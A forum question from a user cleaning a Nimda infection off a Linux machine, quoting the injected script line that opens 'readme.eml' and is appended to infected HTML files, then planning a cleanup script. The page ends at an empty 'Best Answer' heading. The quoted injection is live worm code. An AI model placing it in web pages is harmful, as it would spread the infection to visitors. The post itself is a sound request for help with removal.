(yes, the title is strange, but read on…)
I copied some data from here and there on my linux box and now i find some many eml and HTML:Nimda viruses on my system when i scan it using clamtk. Problem is that these are 1700+ files that i have to manually select and do action. Plus clamtk doesnt clean it? is there any other way possible to remove these viruses?
I have a finding to share, all infected html files contain:
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
multiple times around the end of file (the previous end e.g. it is appended at the end of every html file)
so all i gotta do is:
-
Search for all eml files, delete them, some eml files' paths have spaces and other characters between them, so will have to be careful here to no remove the directory or miss the file.
-
Search for all html files, grep them for these lines, if the lines exists, i would have to delete any lines that match the pattern of :
<script language="JavaScript">window.open("readme.eml", null,
because rest of pattern varies a bit.
I think i need a shell script, my own scripting isnt really great but i will try, in a mean while i am waiting here for answers.
Best Answer